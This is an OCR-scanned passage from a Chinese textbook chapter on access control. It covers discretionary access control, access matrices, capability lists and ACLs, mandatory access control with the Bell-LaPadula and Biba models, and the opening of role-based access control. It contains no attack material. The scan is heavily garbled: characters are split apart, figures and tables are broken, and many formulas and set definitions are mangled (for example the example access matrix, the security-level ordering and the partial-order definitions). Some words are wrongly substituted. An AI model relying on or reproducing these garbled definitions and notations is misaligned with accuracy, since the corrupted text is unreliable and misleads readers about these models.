(CAuthorization) 来 限制 用 户 对 资源 的 访问 级 别 (权利 ) 。 访 问 控制 的 任务 就 是 识别 和 确认 访 
问 系统 的 用 户 ,决定 该 用 户 可 以 对 某 一 系统 资源 进行 何 种 类 型 的 访问 。 

访问 控制 的 实现 首先 要 考虑 对 合法 用 户 进行 验证 ,然后 是 对 控制 策略 的 选用 与 管理 ,最 
后 要 对 非法 用 户 或 是 越权 操作 进行 管理 。 

访问 控制 的 实现 框架 如 图 5. 3 所 示 。 由 监控 器 根据 控制 策略 监控 系统 入 口 和 控制 对 客 
体 信息 的 访问 。 访 问 控制 的 手段 包括 用 户 识别 代码 ,口令 、 登 录 控制 ,资源 授权 (例如 用 户 配 
置 文件 ,资源 配置 文件 和 控制 列表 ) ,授权 核查 、 日 志和 审计 。 


I 


主体 S | 信息 系统 入 口 


1 
(控制 策略 KS ) 一 | ”监控 器 


1 
客体 0 客体 信息 


敏感 区 域 


图 5.3 访问 控制 的 实现 框架 
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5.2 访问 控制 模型 


1985 年 ,美国 军 方 提出 可 信 计 算 机 系统 评估 准则 (TCSEC) ,其 中 描述 了 两 种 著名 的 访 
问 控制 模型 : 自主 访问 控制 模型 (DAC) 和 强制 访问 控制 模型 (MAC)。 其 他 还 有 基于 角色 
的 访问 控制 模型 (RBAC)、 基 于 任务 的 访问 控制 模型 (TBAC)、 基 于 对 象 的 访问 控制 模型 
(OBAC) 和 信息 流 模 型 。 


5.2.1 自主 访问 控制 模型 


1. 自主 访问 控制 定义 

自主 访问 控制 模型 (Discretionary Access Control Model, DAC) 是 根据 自主 访问 控制 
策略 建立 的 一 种 模型 ,允许 合法 用 户 以 用 户 或 用 户 组 的 身份 访问 策略 规定 的 客体 ,同时 阻止 
非 授权 用 户 访问 客体 , 某 些 用 户 还 可 以 自主 地 把 自己 所 拥有 的 客体 的 访问 权限 授予 其 他 
用 户 。 

DAC 根据 主体 的 身份 及 允许 访问 的 权限 进行 决策 。 自 主 是 指 具 有 某 种 访问 能 力 的 主 
体能 够 自主 地 将 访问 权 的 某 个 子 集 授予 其 他 主体 。 

2. DAC 访问 许可 与 访问 模式 

DAC 的 访问 许可 与 访问 模式 描述 了 主体 对 客体 所 具有 的 控制 权 与 访问 权 。 访 问 许 可 
定义 了 改变 访问 模式 的 能 力 或 向 其 他 主体 传送 这 种 能 力 的 能 力 。 访 问 模式 则 指明 主体 对 客 
体 可 进行 何 种 形式 的 特定 的 访问 操作 (如 读 、 写 .运行 ) 。 

访问 许可 (Access Permission) 有 以 下 三 种 类 型 ; 

(1) 等 级 型 (Hierarchical) 。 将 对 客体 访问 存 取 控制 表 的 修改 能 力 划分 成 等 级 ,控制 关 
系 构成 一 个 树 型 (层次 ) 结 构 。 系 统管 理 员 的 等 级 为 等 级 树 的 根 , 根 一 级 具有 修改 所 有 客体 
存 取 控制 表 的 能 力 , 并 且 具 有 向 任意 一 个 主体 分 配 这 种 修改 权 的 能 力 。 在 树 中 最 低级 的 主 
体 不 再 具有 访问 许可 , 即 对 相应 客体 的 存 取 控制 表 不 再 具有 修改 权 。 有 访问 许可 的 主体 ( 即 
有 能 力 修 改 客体 的 存 取 控制 表 ) 可 对 自己 授予 任何 访问 模式 的 访问 权 。 如 图 5. 4 所 示 为 单 
位 的 行政 等 级 型 。 

a 


| | 
部 门 领导 部 门 领导 


科 组 领导 科 组 领导 科 组 领导 科 组 领导 | 
成 员 成 员 成 员 成 员 成 员 成 员 成 员 成 员 


图 5.4 等 级 型 


(2) 拥有 型 (Owner) 。 对 每 个 客体 设置 一 个 拥有 者 (通常 是 客体 的 生成 者 ) 。 拥 有 者 是 
唯一 有 权 修改 客体 访问 控制 表 的 主体 ,拥有 者 对 其 客体 具有 全 部 控制 权 , 但 无 权 将 其 对 客体 
的 控制 权 分 配给 其 他 主体 ;客体 拥有 者 在 任何 时 候 都 可 以 改变 其 所 属 客体 的 存 取 控 制 表 ,并 
可 以 对 其 他 主体 授予 或 者 撤销 其 对 客体 的 任何 一 种 访问 模式 。 
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(3) 自由 型 (Laissez-faire)。 一 个 客体 的 生成 者 可 以 对 任何 一 个 主体 分 配对 它 拥有 的 
客体 的 访问 控制 权 , 即 对 客体 的 存 取 控制 表 有 修改 权 , 并 且 还 可 对 其 他 主体 也 具有 分 配 这 种 
权力 的 能 力 。 在 这 种 系统 中 不 存在 “拥有 者 ”概念 。 

DAC 系统 支持 的 最 基本 的 保护 客体 是 文件 ,对 文件 的 访问 模式 (Access Mode) 设 置 为 
读 -复制 (Read-Copy) 、 写 -删除 (Write-Delete) .运行 (Execute) 无 效 (Null)。 

3. 自主 访问 控制 策略 

DAC 使 用 基于 身份 的 控制 策略 ,具体 分 为 基于 个 人 的 策略 和 基于 组 的 策略 。 

(1) 基于 个 人 的 策略 。 基 于 个 人 的 策略 是 根据 个 人 用 户 可 对 一 个 目标 实施 哪 一 种 行为 
的 列表 来 表示 ,等 价 于 用 一 个 目标 的 访问 矩阵 列 来 描述 。 基 础 (前 提 ) 是 有 一 个 隐 含 的 ,或 者 
显 式 的 缺 省 策略 ,例如 全 部 权限 否决 。 

在 不 同 的 环境 下 , 缺 省 策略 不 尽 相同 , 例 如 在 公开 的 布告 板 环境 中 ,所 有 用 户 都 可 以 得 
到 所 有 公开 的 信息 。 对 于 特定 的 用 户 , 有 时 候 需要 提供 显 式 的 否定 许可 。 例 如 ,对 于 违纪 的 
内 部 员工 ,禁止 访问 内 部 一 些 信息 。 

(2) 基于 组 的 策略 。 基 于 组 的 策略 允许 一 组 用 户 对 于 一 个 目标 具有 同样 的 访问 许可 ， 
相当 于 把 访问 和 矩阵 中 多 个 行 压缩 为 一 个 行 。 

实际 使 用 时 , 先 定义 组 的 成 员 ,再 对 用 户 组 授权 。 同 一 个 组 可 以 被 重复 使 用 ,组 的 成 员 
可 以 改变 。 

4. DAC 的 权限 矩阵 模型 

系统 状态 用 一 个 有 序 三 元 组 Q= (S,0,A) 表 示 , 其 中 SSO,S 表示 主体 的 集合 
(SubjectSet) ,O 表示 客体 的 集合 (ObjectSet) ,A 表示 访问 矩阵 , 行 对 应 于 主体 , 列 对 应 于 客 
体 ,A 的 (i, 门 项 元 素 aj 是 一 个 集合 ,该 集合 中 列 出 了 主体 s; 对 客体 o 所 拥有 的 访问 权限 
(模式 ) 。 

例 1: 设 S={51,s2),0={m,mz,/1,f2,31152} 系统 ,当前 的 状态 如 下 : 

sl mi m2 fi f: $1 $2 
A= {R,W,E} {R,W,E} 

s| {R,W,E) {C,R,E} 

其 中 ,mi 和 ms 分 别 是 存储 段 客体 , /1 和 fs 是 两 个 文件 客体 ,s, 和 ss 是 两 个 主体 。C 
是 控制 权 , 若 主体 s; 对 客体 o 具有 控制 权 c ,那么 s; 就 可 把 它 具 有 的 对 客体 0; 的 某 些 权限 
授予 别 的 主体 。 

系统 状态 是 在 不 断 变化 的 ,变化 是 由 于 用 户 的 一 系列 操作 引起 来 的 系统 状态 变化 ,相应 
的 访问 控制 的 矩阵 也 就 要 发 生变 化 。 引 起 状态 变化 的 操作 基本 上 有 增加 或 删除 权限 、 创 建 
主客 体 等 几 种 。 

5. DAC 权限 矩阵 的 实现 

在 实现 上 ,首先 要 对 用 户 的 身份 进行 鉴别 ,然后 就 可 以 按照 访问 控制 列表 所 赋予 用 户 的 
权限 允许 和 限制 用 户 使 用 客体 的 资源 。 主 体 控制 权限 的 修改 通常 由 特权 用 户 ( 管 理 员 ) 或 是 
特权 用 户 组 实现 。 

授权 必须 满足 最 小 特权 原则 。 最 小 特权 原则 要 求 最 大 限度 地 限制 每 个 用 户 为 实施 授权 
任务 所 需要 的 许可 和 集合。 最 小 特权 原则 在 保持 完整 性 方面 起 着 重要 的 作用 ,可 限制 事故 、 错 
误 、 未 授权 使 用 带 来 的 损害 。 
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授权 的 实施 主体 自主 负责 赋予 和 回收 其 他 主体 对 客体 资源 的 访问 权限 ,一般 采用 访问 
控制 矩阵 和 访问 控制 列表 来 存放 不 同 主体 的 访问 控制 信息 ,从 而 达到 对 主体 访问 权限 的 限 
制 目的 。 

(1) 基于 行 的 自主 访问 控制 一 一 能 力 表 。 访 问 能 力 表 (CL) 用 于 表示 访问 控制 矩阵 中 
基于 行 的 自主 访问 控制 。 能 力 是 为 主体 提供 的 对 客体 具有 特定 访问 权限 的 不 可 伪造 的 标 
志 , 它 决定 主体 是 否 可 以 访问 客体 以 及 以 什么 方式 访问 客体 。 

每 个 主体 * 都 有 一 个 相应 的 能 力 表 ;s; 的 权力 表 由 DAC 权限 矩阵 中 s; 所 对 应 的 行 中 i 
所 有 的 非 空 项 所 组 成 , 它 是 一 张 ;; 可 以 访问 的 所 有 客体 的 明细 表 , 如 图 5. 5 所 示 。 

SI 的 能 力 表 5, 的 能 力 表 
0 | [a 0 | r 


m | {R,W,E} ml 
hh | {C,R,E} A 


{R, W, E} 
{C, R, E} 


图 5.5 不 同 主体 的 能 力 表 


CL 的 实现 如 下 : 


OO0. rew Ol.re bt On.n 


(2) 基于 列 的 自主 访问 控制 一 一 授权 表 。 授 权 控 制 表 (ACL) 是 DAC 中 通常 采用 的 一 
种 安全 机 制 。DAC 的 主要 特征 体现 在 主体 可 以 自主 地 把 自己 所 拥有 客体 的 访问 权限 授予 
其 他 主体 或 者 从 其 他 主体 收回 所 授予 的 权限 ,访问 通常 基于 授权 控制 表 (ACL) ,访问 控制 
的 粒度 是 单个 用 户 。 

每 一 个 客体 o 都 有 一 个 相应 的 授权 表 ,oi 的 授权 表 由 访问 控制 矩阵 中 o 所 对 应 的 列 
中 所 有 非 空 项 组 成 , 它 是 一 张 可 以 访问 w 的 所 有 主体 的 明细 表 。 如 例 1 中 访问 w 的 所 有 主 
体 的 明细 表 , 如 图 5.6 所 示 。 


MI 的 授权 表 了 2 的 授权 表 
Ry | r s | r 
32 | {R, W, E} $2 {C, R, E} 


图 5.6 不 同 客体 的 授权 表 


ACL 是 带 有 访问 权限 的 矩阵 , 这 些 访问 权 是 授予 主体 访问 某 一 客体 的 。 安 全 管理 员 
通过 维护 ACL 控制 用 户 访问 企业 数据 。 对 每 一 个 受 保护 的 资源 ,ACL 对 应 一 个 个 人 用 户 
列表 或 由 个 人 用 户 构成 的 组 列表 , 表 中 规定 了 相应 的 访问 模式 。 

ACL 在 基于 个 人 的 策略 中 ,对 于 系统 中 每 一 个 需要 保护 的 客体 ,为 其 附加 一 个 访问 控 
制 表 , 表 中 包括 主体 标识 符 (ID) 和 对 该 客体 的 访问 模式 。 对 客体 0;: 


0; IDl. re ID2.r ID3.e se Idn. rew 


ACL 对 基于 组 的 策略 在 表示 和 实现 上 更 容易 和 更 有 效 。 将 属于 同一 部 门 或 工作 性 质 
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相同 的 人 归 为 一 组 (Group) ,分 配 组 名 GN ,主体 标识 =ID1. GN ,通配符 * ”可 以 代替 任何 
组 名 或 者 主体 标识 符 。 对 客体 w ,主体 *: 如 果 属 于 crypto 组 ,ACL 实现 如 下 : 


0; | 张 三 .CRYPTO.re| *. CRYPTO.re | 李 四 .CRYPTO.r | x*.x.n 


(3) ACL 与 CL 比较 。 
ACL 与 CL 保存 位 置 不 同 , 其 对 比如 表 5. 1 所 示 。 


表 5.1 ACL 与 CL 比较 


ACL CL 
鉴别 对 象 先 客体 后 主体 先 主体 后 客体 
存储 组 权限 容易 不 便 , 须 附 加 结构 
浏览 访问 权限 容易 困难 
访问 权限 传递 困难 容易 
访问 权限 回收 容易 困难 
相互 转换 ACL->CL 困难 CL->ACL 容易 
操作 系统 采用 集中 式 OS 分 布 式 OS、 现 代 OS 


多 数 集中 式 操作 系统 使 用 ACL 方法 或 类 似 方式 。 由 于 分 布 式 系统 中 很 难 确定 给 定 客 
体 的 潜在 主体 集 ,CL 主要 用 于 分 布 式 OS, 在 现代 OS 中 CL 也 得 到 广泛 应 用 。 

6. 自主 访问 控制 模型 的 特点 

自主 访问 控制 又 称 为 任意 访问 控制 ,Linux,UNIX 和 Windows Server 版 本 的 操作 系统 
都 提供 自主 访问 控制 的 功能 。 

DAC 具有 如 下 特点 : 

(1) 对 用 户 提供 的 灵活 的 数据 访问 方式 应 用 广泛 。 

(2) 在 移动 过 程 中 其 访问 权限 关系 会 被 改变 ,如 用 户 A 可 将 其 对 目标 O 的 访问 权限 传 
递 给 用 户 B, 从 而 使 不 具备 对 O 访问 权限 的 也 可 访问 0。 

(3) 当 用 户 数量 多 、 管 理 数 据 量 大 时 ,由 于 访问 控制 的 粒度 是 单个 用 户 ,ACL 会 很 
庞大 。 

(4) 当 组 织 内 的 人 员 发 生 能 变化 (升迁 、 换 岗 、 招 聘 . 离 职 )、 工 作 职能 发 生变 化 (新 增 业 
务 ) 时 ,ACL 的 修改 变 得 异常 困难 。 

(5) ACL 机 制 管理 授权 处 于 一 个 较 低级 的 层次 ,管理 复杂 、 代 价 高 以 至 易于 出 错 。 


5.2.2 强制 访问 控制 模型 


为 了 实现 比 DAC 更 为 严格 的 访问 控制 策略 ,美国 政府 和 军 方 开发 了 各 种 各 样 的 控制 
模型 ,这些 方案 或 模型 都 有 比较 完善 的 和 详尽 的 定义 。 

1. 强制 访问 控制 模型 概述 

强制 访问 控制 模型 (Mandatory Access Control Model, MAC) 是 一 种 多 级 访问 控制 策 
略 ,系统 事先 给 访问 主体 和 受 控 对 象 分 配 不 同 的 安全 级 别 属 性 ,在 实施 访问 控制 时 ,系统 先 
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对 访问 主体 和 受 控 对 象 的 安全 级 别 属性 进行 比较 ,再 根据 控制 策略 决定 访问 主体 能 和 否 访问 
该 受 控 对 象 。 

MAC 系统 对 访问 主体 和 受 控 对 象 实行 强制 访问 控制 ,控制 策略 给 出 资源 受到 的 限制 
和 实体 的 授权 ,对 资源 的 访问 取决 于 实体 的 授权 而 非 实体 的 身份 ,决策 在 批准 一 个 访问 之 前 
需要 进行 授权 信息 和 限制 信息 的 比较 。 

MAC 系统 中 所 有 主体 对 客体 的 访问 是 否 允许 进行 或 允许 进行 何 种 访问 必须 由 系统 来 
决定 ,系统 根据 主体 的 工作 职责 或 被 信任 的 程度 、 客 体 的 机 密 性 或 重要 程度 来 决定 赋予 一 定 
的 安全 级 别 。 用 户 不 能 改变 自身 和 客体 的 安全 级 别 , 只 有 管理 员 才能 够 确定 用 户 和 组 的 访 
问 权限 。 系 统 通 过 比较 用 户 和 访问 的 客体 安全 级 别 来 决定 用 户 是 否 可 以 访问 该 客体 。 

由 于 MAC 通过 分 级 的 安全 标签 实现 了 信息 的 单 向 流通 ,因此 它 一 直 被 军 方 采用 ,其 中 
最 著名 的 是 BLP 模型 和 Biba 模型 。BLP 保证 保密 性 ,用 于 军事 ;Biba 保证 完整 性 ,用 于 
商业 。 

强制 访问 控制 模型 的 特点 : 

(1) 系统 对 所 有 主体 及 其 所 控制 的 客体 (例如 进程 文件 . 段 . 设 备 ) 实 施 强 制 访问 控制 。 

(2) 为 这 些 主体 及 客体 指定 敏感 标记 ,这 些 标记 是 等 级 分 类 和 非 等 级 类 别 的 组 合 , 它 们 
是 实施 强制 访问 控制 的 依据 。 

(3) 系统 根据 主体 和 客体 的 敏感 标记 来 决定 访问 模式 。 

(4) MAC 通过 梯度 安全 标签 实现 单 向 信息 流通 模式 。 

2. MAC 模型 语义 描述 

强制 访问 控制 (MAC) 中 ,系统 包含 主体 集 S 和 客体 集 O, 每 个 S 中 的 主体 ; 及 客体 集 
O 中 的 客体 o 都 属于 一 个 固定 的 安全 类 SC ,安全 类 SC 二 <L,C 二 ,其 中 工 是 有 层次 (等 级 ) 
的 安全 级 别 ,C 是 无 层次 ( 非 等 级 ) 的 安全 范畴 (类 别 )。SC 可 构成 偏 序 关系 。 

安全 级 别 即 密级 ,一 般 定义 有 5 级 : 绝密 级 (Top Secret,T) ,秘密 级 (Secret,S) ,机 密级 
(Confidential,C) ,限制 级 (Restricted,R) 和 无 密级 (Unclassified,U), 其 中 UR<C<S< 
T;A={uyrsc,sst)} ,三 A, 三才 是 偏 序 集 。 

主体 和 客体 在 分 属 不 同 的 安全 类 别 时 ,都 属于 一 个 固定 的 安全 类 别 SC,SC 就 构成 一 个 
偏 序 关系 (比如 工 表示 绝密 级 ,就 比 密级 S 要 高 )。 当 主体 ; 的 安全 类 别 为 了 ,而 客体 o 的 安 
全 类 别 为 S 时 ,用 偏 序 关系 可 以 表述 为 SC(*) 之 SC(o) 。 

安全 范畴 一 般 指 可 严格 区 分 的 职能 组 织 或 类 别 ,例如 部 门 集 B={ 部 门 1, 部 门 2,…}， 
< 所 28,E > 是 偏 序 集 。 

MAC 对 访问 主体 和 受 控 对 象 标识 两 个 安全 标记 , 即 具有 偏 序 关系 的 安全 等 级 标记 和 
非 等 级 分 类 标记 。 安 全 标签 是 限制 在 目标 上 的 一 组 安全 属性 信息 项 。 在 访问 控制 中 ,一 个 
安全 标签 隶属 于 一 个 用 户 一 个 目标 ,一 个 访问 请 求 或 传输 中 的 一 个 访问 控制 信息 。 

安全 标记 用 有 序 二 元 组 (a, 昌 ) 表 示 , 其 中 a€A,HSB( 即 HSC23)。 因 此 ,安全 标记 
(或 称 为 安全 级 ) 空 间 为 AX23={(a, 昌 ) | a€E A,HC23}。<<A, 达 二 是 一 全 序 集 ,过 23， 
己 > 是 一 偏 序 集 ,在 集合 AX23 上 定义 关系 委 : ,对 于 (a ,Hi),(as,H,)EAX23, 有 : 

(a1;Hi) (as，H;)， 当 且 仅 当 a 所 az,H, GH;。 
考虑 到 偏 序 关 系 ,MAC 中 主体 对 客体 的 访问 主要 有 4 种 方式 ， 
。 向 下 读 (rd,read down)。 主 体 安全 级 别 高 于 客体 信息 资源 的 安全 级 别 时 允许 的 读 
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操作 。 
。 向 上 读 (ru, read up)。 主 体 安全 级 别 低 于 客体 信息 资源 的 安全 级 别 时 允许 的 读 
操作 。 
。 向 下 写 (wd,write down) 。 主 体 安全 级 别 高 于 客体 信息 资源 的 安全 级 别 时 允许 执行 
的 动作 或 是 写 操作 。 
。 向 上 写 (wu, write up)。 主 体 安全 级 别 低 于 客体 信息 资源 的 安全 级 别 时 允许 执行 的 
动作 或 是 写 操作 。 
3. MAC 的 BLP 模型 
BLP 模型 于 1976 年 由 Bell 和 LaPadula 提出 ,也 称 为 Bel-LaPadula 模型 ,是 典型 的 信 
息 保 密 性 多 级 安全 模型 ,主要 应 用 于 军事 系统 。BLP 模型 是 处 理 多 级 安全 信息 系统 的 设 
计 基 础 ,客体 在 处 理 绝密 级 数据 和 秘密 级 数据 时 ,要 防止 处 理 绝密 级 数据 的 程序 把 信息 
泄露 给 处 理 秘密 级 数据 的 程序 。BLP 模型 的 出 发 点 是 维护 系统 的 保密 性 ,有 效 地 防止 信 
息 泄 露 。 
BLP 模型 的 强制 访问 控制 安全 策略 包括 : 
(1) 对 给 定安 全 级 别 的 主体 , 仅 被 允许 对 同一 安全 级 别 和 较 低 安全 级 别 上 的 客体 进 
行 “ 读 ”。 
(2) 对 给 定安 全 级 别 上 的 主体 , 仅 被 允许 向 相同 安全 级 别 或 较 高 安全 级 别 上 的 客体 进 
行 “ 写 <” 
(3) 任意 访问 控制 允许 用 户 自行 定义 是 否 让 个 人 或 组 织 存 取 数据 。 
BLP 模型 建立 的 安全 访问 控制 原则 就 是 无 上 读 、 无 下 写 , 模 型 如 图 5.7 所 示 。 显 然 ,对 
于 完整 性 集合 中 的 任意 元 素 A、B、C 都 有 : 
(1) 自 反 性 : A<A; 
(2) 传递 性 : 如 果 A<B 且 BC, 则 A<C; 
(3) 反对 称 性 : 如 果 A<B 且 B<A, 则 A=B。 


图 5.7 BLP 模 型 
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BLP 模型 主要 用 来 控制 主体 和 客体 之 间 的 信息 流动 ,如 图 5. 8 所 示 设 计 了 一 种 信息 流 


动 的 策略 来 保证 信息 安全 性 。BLP 模型 信息 流 NAE 汪 霹 放 
动 具 有 如 下 特性 : Objects 
。 简单 安全 性 。 用 偏 序 关系 可 以 表示 为 RW WwWWW 目 IT 
rd, 当 且 仅 当 SC(s) 宇 SC(o), 人 允许 读 操 R RW WW WE Sw 
作 R,s 可 以 读 取 o。 简 单 安全 性 确定 了 RR RW WW 目 cj 时 
读 操作 原则 ,对 读 操 作 来 说 ,主体 必须 对 RR R RW WEH_R 
客体 有 支配 权 ,这 一 原则 也 称 为 下 读 。。 RR RR RW 三 0 
原则 。 Subjects T S$ C R U 
图 5.8 ”BLP 模型 信息 流向 


星 (* ) 特 性 。 用 偏 序 关系 可 以 表示 为 
wu, 当 上 且 仅 当 SC(s) 三 SC(o) ,允许 写 操作 W,s 可 以 修改 。。 星 特性 确定 了 写 操作 
原则 ,对 于 写 操作 来 说 ,客体 必须 对 主体 有 支配 权 ,这 一 原则 也 叫 作 上 写 原 则 。 

BLP 模型 的 优点 是 有 效 防止 低级 用 户 和 进程 访问 安全 级 别 比 他 们 高 的 信息 资源 ,安全 
级 别 高 的 用 户 和 进程 也 不 能 向 比 他 安全 级 别 低 的 用 户 和 进程 写 人 数据 。 

BLP 控制 模型 的 不 足 : BLP 模型 “只 能 从 下 读 、 向 上 写 ” 的 规则 忽略 了 完整 性 的 重要 安 
全 指标 ,使 非法 .越权 算 改 成 为 可 能 ; BLP 模型 定义 了 安全 性 属性 , 即 以 一 组 规则 表示 什么 
是 一 个 安全 的 系统 ,比较 容易 实现 ,但 不 能 更 一 般 地 以 语义 的 形式 阐明 安全 性 的 含义 ,因此 
不 能 解释 主客 体 框架 以 外 的 安全 性 问题 。 

例如 ,在 一 种 远程 读 的 情况 下 ,一 个 高 安全 级 主体 向 一 个 低 安全 级 客体 发 出 远程 读 请 
求 , 可 以 被 看 作 是 从 高 向 低 的 一 个 消息 传递 ,也 就 是 “向 下 写 ”。 

另 一 个 例子 是 如 何 处 理 可 信 主 体 的 问题 。 可 信和 主体 可 以 是 管理 员 或 是 提供 关键 服务 的 
进程 , 像 设备 驱动 程序 和 存储 管理 功能 模块 ,这 些 可 信和 主体 若 不 违背 BLP 模型 的 规则 就 不 
能 正常 执行 它们 的 任务 ,可 能 引起 泄露 危机 。 

4. MAC 的 Biba 模型 

由 于 BLP 模型 只 解决 了 信息 的 保密 问题 ,其 在 完整 性 定义 存在 方面 有 一 定 缺 陷 ,没有 
采取 有 效 的 措施 来 制约 对 信息 的 非 授 权 修改 ,因此 使 非法 、 越 权 算 改 成 为 可 能 。 

Biba 模型 模仿 BLP 模型 的 信息 保密 性 级 别 , 定 义 了 信息 完整 性 级 别 ,在 信息 流向 的 定 
义 方面 不 允许 从 级 别 低 的 进程 到 级 别 高 的 进程 ,也 就 是 说 用 户 只 能 向 比 自己 安全 级 别 低 的 
客体 写 人 信息 ,从 而 保证 非法 用 户 创建 安全 级 别 高 的 客体 信息 ,从 而 确保 没有 越权 、 算 改 等 
行为 的 产生 。 

Biba 模型 的 安全 控制 原则 就 是 不 下 读 、 不 上 写 。 用 偏 序 关系 可 以 表示 为 ru, 当 上 且 仅 当 
SC(s) 三 SC(0) ,允许 读 操作 ,s 可 以 读 取 o;rwd, 当 且 仅 当 SC(s) 宇 SC(o) ,允许 写 操作 ,s 可 
以 修改 o ,如 图 5.9 所 示 。 

Biba 模型 禁止 向 上 “ 写 ”, 这 样 使 得 完整 性 级 别 高 的 文件 是 一 定 由 完整 性 高 的 进程 所 产 
生 的 ,从 而 保证 了 完整 性 级 别 高 的 文件 不 会 被 完整 性 低 的 文件 或 完整 性 低 的 进程 中 的 信息 
所 覆盖 。 没 有 下 “ 读 ”, 这 样 使 得 完整 性 级 别 高 的 文件 以 命令 形式 向 下 传达 ,但 上 读 使 得 信息 
的 保密 性 差 。 

Biba 控制 模型 具有 如 下 特点 : 可 同时 针对 有 层次 的 安全 级 别 和 无 层次 的 安全 种 类 ;是 
和 BLP 模型 相对 立 的 模型 ,改正 了 被 BLP 模型 所 忽略 的 信息 完整 性 问题 ,但 在 一 定 程度 上 
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主体 客体 主体 客体 

High 允许 读 High High High 
Intergrity F Intergrity Intergrity Intergrity 
Mediun Mediun Mediun Mediun 
Intergrity 人 允许 读 Intergrity Intergrity Intergrity 

Low 禁止 读 Low Low Low 
Intergrity 于 上 Intergrity Intergrity Intergrity 


图 5.9 Biba 安全 模型 
却 忽视 了 保密 性 。 
5.2.3 基于 角色 的 访问 控制 模型 


MAC 和 DAC 控制 为 每 个 用 户 赋予 对 客体 的 访问 权限 规则 集 , 在 这 一 过 程 中 经 常 将 具 
有 相同 职能 的 用 户 聚 为 组 ,然后 再 为 每 个 组 分 配 许可 权 。 用 户 自 主 地 把 自己 所 拥有 的 客体 
的 访问 权限 授予 其 他 用 户 。 

但 是 ,如 果 企 业 的 组 织 结构 或 是 系统 的 安全 需求 处 于 变化 的 过 程 中 时 ,那么 就 需要 进行 
大 量 烦 琐 的 授权 变动 ,系统 管理 员 的 工作 将 变 得 非常 繁重 ,更 主要 的 是 容易 发 生 错 误 ,造成 
一 些 意 想不到 的 安全 漏洞 。 

考虑 到 上 述 因素 ,必须 引入 新 的 模型 加 以 解决 。 

1. RBAC 概述 

基于 角色 的 访问 控制 模型 (Role-based Access Control Model, RBAC) 的 基本 思想 是 将 
访问 许可 权 分 配给 一 定 的 角色 ,用 户 通过 饰演 不 同 的 角色 获得 角色 所 拥有 的 访问 许可 权 。 
角色 由 系统 管理 员 定义 ,角色 成 员 的 增 减 也 只 能 由 系统 管理 员 来 执行 , 即 只 有 系统 管理 员 有 
权 定 义 和 分 配角 色 。 用 户 与 客体 无 直接 联系 ;用 户 只 有 通过 角色 才 享 有 该 角色 所 对 应 的 权 
限 , 从 而 访问 相应 的 客体 。 因 此 用 户 不 能 自主 地 将 访问 权限 授 给 别 的 用 户 。RBAC 模型 如 
图 5. 10 所 示 , 包 括 用 户 、 角 色 和 许可 集合 ,许可 是 客体 集 与 操作 集 相 联系 的 集合 。 


许可 


DC 


图 5.10 RBAC 模型 


RBAC 中 许可 被 授权 给 角色 ,角色 被 授权 给 用 户 , 用 户 不 直接 与 许可 关联 。RBAC 对 访 
问 权 限 的 授权 由 管理 员 统一 管理 ,而 且 授权 规定 是 强加 给 用 户 的 ,这 是 一 种 非 自 主 型 集中 式 
访问 控制 方式 。 

在 RBAC 中 ,系统 管理 员 容 易 实 施 最 小 特权 原则 ,可 以 根据 组 织 内 的 职责 需求 分 配给 
角色 不 同 的 最 小 权限 ,只 有 角色 需要 执行 的 操作 才 授 权 给 角色 。 当 一 个 主体 要 访问 某 资源 
时 ,如 果 该 操作 不 在 主体 当前 活跃 角色 的 授权 操作 之 内 ,该 访问 将 被 拒绝 。 

RBAC 访问 控制 过 程 如 图 5. 11 所 示 , 包 括 用 户 、 角 色 、 权 限 、 访 问 控制 (策略 ) 和 资源 。 
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《计算 机 系统 安全 》 于 


系统 按 职 能 划分 角色 并 分 配 一 组 权限 ,通过 认证 的 用 户 被 指派 某 一 角色 , 当 它 需要 访问 资源 
时 ,按照 访问 控制 策略 和 角色 赋予 的 权限 访问 。 


1. 认 证 3. 请 求 
用 上 一 航 | 机 限 
指派 4 
5. 访 问 请 求 
访问 控制 | 人 访问 -| 。 资源 


图 5.11 RBAC 访问 控制 过 程 


RBAC 模型 分 为 基本 模型 RBAC0、 角 色 分 层 模 型 RBAC1、 角 色 约 束 模型 RBAC2 和 统 
一 模型 RBAC3 这 4 种 ,其 相互 关系 如 图 5. 12 所 示 。 RBAC3 

RBAC 是 实施 面向 企业 的 安全 策略 的 一 种 有 效 的 访 
问 控制 方式 ,其 具有 灵活 性 方便 性 和 安全 性 的 特点 , 目 
前 在 大 型 数据 库 系统 的 权限 管理 中 得 到 普遍 应 用 。 KBAREL RBAG? 

在 实际 应 用 中 ,用 户 并 不 是 可 以 访问 的 客体 信息 资 
源 的 所 有 者 (这 些 信息 属于 企业 或 公司 ) ,访问 控制 应 该 
基于 员工 的 职务 而 不 是 基于 员工 在 哪个 组 或 谁 是 信息 的 
所 有 者 。 访 问 控制 是 由 各 个 用 户 在 部 门 中 所 担任 的 角色 
来 确定 的 ,例如 ,一 个 学 校 可 以 有 教工 ,老师 ,学 生 和 其 他 管理 人 员 等 角色 。 

2. 角色 的 作用 

角色 (Role) 是 一 种 访问 权限 的 集合 ,一 个 可 以 用 来 完成 一 定 事务 的 命名 组 或 者 说 一 个 
组 织 结构 内 的 一 个 岗位 或 职务 ( 带 有 行为 责任 ) 。 

不 同 的 角色 通过 不 同 的 事务 来 执行 各 自 的 功能 。 事 务 (Transaction) 是 指 一 个 完成 一 
定 功能 的 过 程 , 可 以 是 一 个 程序 或 程序 的 一 部 分 。 

角色 和 组 的 主要 区 别 在 于 用 户 属于 组 是 相对 固定 的 ,而 用 户 能 被 指派 到 哪些 角色 则 受 
时 间 、 地 点 、 事 件 等 诸多 因素 影响 ,角色 比 组 的 抽象 级 别 要 高 。 组 是 指 一 组 用 户 的 集合 ,角色 
包括 一 组 用 户 的 集合 以 及 一 组 操作 权限 的 集合 。 

RBAC 从 控制 主体 的 角度 出 发 ,根据 管理 中 相对 稳定 的 职权 和 责任 来 划分 角色 ,将 访问 
权限 与 角色 相 联系 , 通 过 给 用 户 分 配合 适 的 角色 ,让 用 户 与 访问 权限 相 联系 。 角 色 成 为 访问 
控制 中 访问 主体 和 受 控 对 象 之 间 的 一 座 桥梁 。 

RBAC 可 以 看 作 是 基于 组 的 访问 控制 的 一 个 变 体 , 一 个 角色 对 应 一 个 组 。 角 色 可 以 看 
作 是 一 组 操作 的 集合 ,不 同 的 角色 有 具有 不 同 的 操作 集 ,这 些 操 作 集 由 系统 管理 员 分 配给 
角色 。 

3. 基本 模型 RBAC0 

基本 模型 RBAC0 规定 了 任何 RBAC 系统 所 必需 的 最 小 需求 。RBAC0 包括 5 个 基本 
数据 元 素 : 用 户 users(USERS) .角色 roles(ROLES) .许可 权 permissions(PRMS) (包括 目 
